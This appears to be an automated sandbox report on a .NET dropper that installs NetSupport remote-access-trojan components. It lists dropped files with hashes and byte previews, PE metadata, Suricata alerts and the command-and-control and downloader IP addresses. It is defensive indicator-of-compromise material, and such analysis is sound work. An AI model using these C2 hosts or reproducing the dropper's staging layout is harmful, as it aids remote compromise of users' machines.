                                                                                                          SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                          MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                          SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                          SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                          SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                          Malicious:false
                                                                                                          Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                          C:\Users\user\AppData\Local\DNScache\pcicapi.dll

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33144
                                                                                                          Entropy (8bit):6.737780491933496
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                          MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                          SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                          SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                          SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\DNScache\remcmdstub.exe

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63320
                                                                                                          Entropy (8bit):6.439464682558898
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:bJfanvXuN86jJ9hUHYBlXUYwT24a+yVwQ:lanPGjJTU4IYia+yVX
                                                                                                          MD5:35DA3B727567FAB0C7C8426F1261C7F5
                                                                                                          SHA1:B71557D67BCD427EF928EFCE7B6A6529226415E6
                                                                                                          SHA-256:89027F1449BE9BA1E56DD82D13A947CB3CA319ADFE9782F4874FBDC26DC59D09
                                                                                                          SHA-512:14EDADCEECEB95F5C21FD3A0A349DD2A312D1965268610D6A6067049F34E3577FC96F6BA37B1D6AB8CE21444208C462FA97FAB24BBCD77059BC819E12C5EFC5A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(T-.I:~.I:~.I:~..~.I:~.1.~.I:~.I;~.I:~..~.I:~..~.I:~..~.I:~..~.I:~Rich.I:~........PE..L.....(Y.....................J.......!............@.......................... .......D....@....................................<.......T...............X'..............................................@...............@............................text............................... ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Jjv9ha2GKn.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\Jjv9ha2GKn.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
                                                                                                          MD5:EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
                                                                                                          SHA1:B2A052ACB64FC7173E568E1520AA4D713C5E90A3
                                                                                                          SHA-256:50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
                                                                                                          SHA-512:D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
                                                                                                          Malicious:true
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2nd2_3[1].zip

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64489
                                                                                                          Entropy (8bit):7.993298011514335
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:NFyQKEjEK5CXhJ8bVSSd1ck0fEHv1gqvK6CeLd2qyV0BlvqMKSK:LPIuCX8SSd1/0fEdDi6hzpPq13
                                                                                                          MD5:6177485D0E1E5E167AB65798E70D44AB
                                                                                                          SHA1:6634623E2B5359BC386A633358ADFD6F4DA9A64C
                                                                                                          SHA-256:7495676881CD5B7D6D09AD43F90529F6E6B2761697E5A24397F8E8E03FAF05DF
                                                                                                          SHA-512:920E5E8CCA53B9C825E7761631F36B61BFE6206EAA734B799BD82201147378EDD2B847EEAD9A66FB1020AC2F488B0CF1EF24FAE34F81AC7237BE6AAA1F26226D
                                                                                                          Malicious:false
                                                                                                          Preview:PK........e..H'...8...xI......PCICHEK.DLL.9y\S..s..a.R...@..(..(.....4%.......l.7A.Zeq...u...X..Jk..Zk..l.}..uo.....Z..L..[.?...}.sp..Y...3sc..H...@u8.j@.........c...c.H...?$.H/.-......Z..d...99o3..&y....h.q...{.p..J<....55.>/.l.!..h...7.h..|...&.@GS,.w]....zm....J.P:..fo.y.oQ...; .NZ...\......!7Da...<g..N`v..Q.!t.:.%.!.....B.^j.*x@/.G.Y..wE.....F.V..........L.E.:...."v...gk)2Nb.S...|.....\c$/.Z.k.KF..{<g0..7.......d...GK.i.4..?..u..q{...Y....4d.[y.{.=~..F......f..n..=..o...k....F.TT.(.2......!..........i......;.....n>.c.)....6.........._.+...3...gG#................K.+a.....w.J.=.?.n..T+WWg..q..mP.>..*.;......*0i?.q..S...O..H.tt.$.<u.f..g....w.$3.m.E...-.\..|Pm......*..Z.E\...=.lo...7fE....u..z..e..z...SI.duk...OT....2.......j2.6.2D'.@.5...5*j......[.;j.Q....Iz..g.a.7Q0...q;...R...{!T....53..v8T..=.......<..9..l.>.Id`.t..\/?.3Z.n.RV.+....,...j.#......?..;@nv.;;.f...&....6.....$.o{.._.........../.q...x.6....;H.z.\V.b...}.

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\2nd2_2[1].zip

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1397545
                                                                                                          Entropy (8bit):7.996586865211503
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:24576:ML8FKI/QnVC01gplou+ufwZwNDF3iioYr3oXPrPRB7t6U/9iYTN+sJvRf48c960H:G8N/QnYggLou+ufwZwNDF3D7wnR9iY8r
                                                                                                          MD5:3BE03950993CAB960114E6A5A1D8378E
                                                                                                          SHA1:81C1C423CE16056E361D73B2604BA3440C92F239
                                                                                                          SHA-256:72378062978693700F5DEC49F4E5AF35CF75B7061317766731A25044CFC437E3
                                                                                                          SHA-512:C521389A3D1539CE6E560F053DAA6C55219341C48E1CB88346481CE9E1DECE0EEBC6D8E7AFC06C8AD89F103BA191EBBFAEDA84DEF1B5DB659E5C85A98F9146E6
                                                                                                          Malicious:false
                                                                                                          Preview:PK........Aa.O..2S....:......mscpxl32.dLL.;.X\.g^d.Cfb....ub..v...a 0.($C .. ...yLf.....a.&7..U...6..6.._.D..!..$..Fkl.j.7,....$..........v._w...{........9..s)Y.K$..)d.#...)...t..E..!G"O..'*>u[....ow.7:j[..j......x..-..-.`eY|k{.59*j.Z..zz.[..Rt......NKyW..Eun...T.....-...o..UMu6....b&.X$#?3.,..[|...9...H.a...P..W....d2..(o._...G.*~._.E....Cy..2P................/Or z8..t....d....;.....)..{..k.Z"...:..0$..On..[.<o.....x........v.x...Y[..x.I. [......7M..D...a..')..KT".?m.W.0..H..D*.7L.o....\..>,...\5.',..d.B.<..M..X...J........V.I.C....!w.Z.M............e..Ya...V...i.........o.......lu....u......,.............._>.....k....o*l..^..[N...`.<>..N.O.....z'T......s.1.\.X..R.C...~c#...".P..m.c+......[I.>.l....}....xh...O..t...~.N%.O.i4u.....=.C=b.N](..#L.i.-zR..X.8..w.NB...}j...y...!..rO.g.G....R[s.'+^A.a....[...='.y.e..vn..U.Y......J.C.3G[8.......b..s.W...0.E.'.....^_5.....5...4.h.[".......(.R.$...u.+=..y.....`.a..<............%.u\U.lV.'8&.=!b...

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\2nd2_4[1].zip

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787082
                                                                                                          Entropy (8bit):7.997955572815781
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:24576:zKyeop5xuiZil2MroDAQPyLZ5FvFHj60Ywr:zK2lglVG5PWZ5FvcBc
                                                                                                          MD5:26ACC6BCC9C54A6D41233085F7D7CB33
                                                                                                          SHA1:5D19C99C9552332FD35D89B9EE7205133FD0A515
                                                                                                          SHA-256:BD409A9F5B3E37A0030D60473800F829417DAA09B69B65E7BD8FEDABEF9DC824
                                                                                                          SHA-512:0E777992563864765923F52B23600DA27697E609767B9C5246CF40E649255970650DD879E4D1E03FC8A6EDC69329247E09A990F177EE486DDBEFCEAE9AECA268
                                                                                                          Malicious:false
                                                                                                          Preview:PK........,a.O...Rb...........netmsg.dll.VMHTQ........D.'......P3...P...^3.q.y3.7.....A.."ZV...,Zh..lc.V.Q.].m..w..._."A.:.s..{..9...zO.#. D...X@.Z.1)..Ok.$.T.`.,...%=3....2c...Y.t'.3...Cf*..#55.....+G>\.88Wd......7T?...)...@..c...q."....*.v.L6...4.d.....+,.X.gF.|.VHF.r..Ud.U..'*5..Q$kOf....h..k..q=7...c.&].29..sXC.&7.....r.j6..\...E....z..y...t.l...y..SCcTAyb'....k1D.#.n.-.._f.]......|y..#.;fn.k...>.|..9.!W..mn...u.5.ph.X.....z........qt.....#..i........m'....-C..dku...m'.G.c?..(.!d."...ZKb.6-;8.4e..L#...K.&...l#~.2)d`Q~..X..b...b...G>G..H..Hk.Ir.P..[`.|..=.M"....b.W$<.H..N..HM.|.F..<..(...G.~.26..'$.m.....(..VZM.F.C..!y.....2.H.).N ./.....h..d0%.M0z..{.......QZ.....LeGEw....h....dR.]..a.....Y...!.A........O.~....C.=.'q...3%..Q..WyE...vy.F..].d..{Hn.W..u......n.`iyi.....n)..n....s..w.*>.._..?.}b....^....n...k.|G_Yw.<.......+!W.x.^S...!....PK........s..V...(............TCCTL32.DLL.{`T...~..\`.....X."ADV..D.c...v...'&.-...Z.]A.!t.m

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2nd2_1[1].zip

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41029
                                                                                                          Entropy (8bit):7.989346444055703
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:ZBLBjV0IlNtNnLGs6b5SIco4N02W0EdocXH9bziI+Bw0cXMlDB4G:vTNtRLG9bg9ouVENbziVw0c879
                                                                                                          MD5:77DED36570B38B3C9F244ADBFC6599D6
                                                                                                          SHA1:5593CCC6E14D643938EF350BE7763943AD0472E9
                                                                                                          SHA-256:F0881EA39F315F08F7BE09ED39A610CE0AC7ABB85430411649D66C45074AC756
                                                                                                          SHA-512:A3DD37BFADF540EB9CB26E9A3CE831C393222B5E9B80198DE16A7DD27B74FB89083E5EBCAE178D3CB9DC5C723174EA4B41EC92536085C144E315ECFF64E1C2A5
                                                                                                          Malicious:false
                                                                                                          Preview:PK........|..S.........J......msauserext.dll.|.xS...,....b.C.P.I...%....-......`la=#9..H.......-.;l.n3.:. .m..L..z.F`..!Y..&$..7.LE.M.)..8h.....4.........{.=..s...9W.......B..R8L.I"?...HK../%'..~.IE..w.9]~....g...=.NA....D....m..ut:.........|....~..I..W.~..o....nZ......s..Z...h.~^...ft....r....Z..7"..JH.b....5E`#Dy......A%]...!.F....JB..X..a.x..3.;ZJhE+7.K.x&..o..C6.P..K.FEf?....*B........x.....?...~...!....r.?:P;.a.....D.qD28.....P.h ...d9.PF...o...|~_+a6...2b.?...l.mD.....6./.......EH..3......@..l$. $.E...n.D6....AH-..!....PN ...}......hq....Y.XF.8.......\N.J...Fn.>!..$..v..2.,....8.0.....0f.;...0f.]...l.3[&dA.t_....n|...g0.b6...z...p.av.. f#...(.f.`.........1...{d}......p..`..7.l...#..t.6.N..m..o|......Z;}.F.~.~#..p........OU}.}...........a.......]U........v.N..'.......t9x......{..N....]..H"..pux.Y.^o....R...(im..=B..F.g.....*kKJ}<emw.....m..@.j..v..x_..v.4..}..x9:...9......x.u>./..2./.5..._.u...t*...>.W..M...q.<|.>..l#...[...{].|]

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\loca[1].htm

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):16
                                                                                                          Entropy (8bit):3.077819531114783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:llD:b
                                                                                                          MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                          SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                          SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                          SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                          Malicious:false
                                                                                                          Preview:40.7357,-74.1724

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):6.255613138289018
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          File name:Jjv9ha2GKn.exe
                                                                                                          File size:1'128'960 bytes
                                                                                                          MD5:aedf7f67cf6d7f8ef348ba681046fe51
                                                                                                          SHA1:707ac1c67e2d569613c1b5cc3f809d6bd3cddc26
                                                                                                          SHA256:6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0
                                                                                                          SHA512:83297d6611b3c168952c700a10fcca736fe96205298a81eb4d21523b260f933b41f71f4fc9da41b60098d0687d822be6a93b3b29caf692bfaa32e1762a392a01
                                                                                                          SSDEEP:24576:WDXXsCAM4OF+PMwrSVlbmfDYkhDvGtjXtGUAF9kJ7MqudghfEuCj0hThiHHxlhVV:WDXtMw5pwkJ
                                                                                                          TLSH:D13518D98EA57226C257F2380F63871E676C2D73E6018A8948839597FE3D34EDC184ED
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<..3.....................>........... ... ....@.. ....................................`................................

                                                                                                          File Icon

                                                                                                          Icon Hash:1016339396b696b3

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x51189e
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x33121C3C [Mon Feb 24 22:54:52 1997 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1118500x4b.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x3b9c.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1160000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000x10f8a40x10fa006bc73c5474aae2519b2b72c4408eeef6False0.5554074508168431data6.27710859546898IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x1120000x3b9c0x3c00d89b47806cf5b981a3d7161a0a49e5c2False0.29153645833333336data3.875475461642215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x1160000xc0x2002873d1e0dd4afd69465a12cc0a5eb3caFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_CURSOR0x1125e00x134data0.40584415584415584
                                                                                                          RT_CURSOR0x1127140x134data0.40584415584415584
                                                                                                          RT_BITMAP0x1128480x3e8Device independent bitmap graphic, 112 x 16 x 4, image size 896, 16 important colorsHebrewIsrael0.383
                                                                                                          RT_BITMAP0x112c300xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/mEnglishUnited States0.4305555555555556
                                                                                                          RT_BITMAP0x112d080xd8Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/mEnglishUnited States0.42592592592592593
                                                                                                          RT_ICON0x112de00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.16909005628517823
                                                                                                          RT_ICON0x113e880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.46365248226950356
                                                                                                          RT_ICON0x1142f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.39864864864864863
                                                                                                          RT_MENU0x1144180x242dataEnglishUnited States0.48961937716262977
                                                                                                          RT_MENU0x11465c0x1c4dataEnglishUnited States0.4557522123893805
                                                                                                          RT_DIALOG0x1148200xa2dataHebrewIsrael0.7592592592592593
                                                                                                          RT_DIALOG0x1148c40x296dataHebrewIsrael0.48942598187311176
                                                                                                          RT_DIALOG0x114b5c0x2dcdataHebrewIsrael0.46584699453551914
                                                                                                          RT_DIALOG0x114e380xfadataHebrewIsrael0.62
                                                                                                          RT_DIALOG0x114f340x336dataEnglishUnited States0.49635036496350365
                                                                                                          RT_STRING0x11526c0x144dataEnglishUnited States0.5308641975308642
                                                                                                          RT_STRING0x1153b00x92Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.5068493150684932
                                                                                                          RT_STRING0x1154440x40dataEnglishUnited States0.640625
                                                                                                          RT_STRING0x1154840x32Matlab v4 mat-file (little endian) I, numeric, rows 0, columns 0EnglishUnited States0.62
                                                                                                          RT_STRING0x1154b80x28cdataEnglishUnited States0.4125766871165644
                                                                                                          RT_STRING0x1157440xe2Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.4557522123893805
                                                                                                          RT_ACCELERATOR0x1158280x30dataHebrewIsrael0.9375
                                                                                                          RT_GROUP_CURSOR0x1158580x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                          RT_GROUP_ICON0x11586c0x22data1.0588235294117647
                                                                                                          RT_GROUP_ICON0x1158900x14data1.25
                                                                                                          RT_VERSION0x1158a40x2f8dataHebrewIsrael0.4328947368421053

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          HebrewIsrael
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-10T08:57:08.084054+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.54986588.210.12.583785TCP
                                                                                                          2024-12-10T08:58:24.482566+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54983123.254.224.41443TCP
                                                                                                          2024-12-10T08:58:26.643824+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54983723.254.224.41443TCP
                                                                                                          2024-12-10T08:58:31.227150+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54985123.254.224.41443TCP
                                                                                                          2024-12-10T08:58:33.561114+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54985723.254.224.41443TCP
                                                                                                          2024-12-10T08:58:37.212776+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.54986588.210.12.583785TCP
                                                                                                          2024-12-10T08:58:37.654624+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.54986588.210.12.583785TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 10, 2024 08:58:22.270113945 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:22.270157099 CET4434983123.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:22.270252943 CET49831443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:22.272651911 CET49831443192.168.2.523.254.224.41
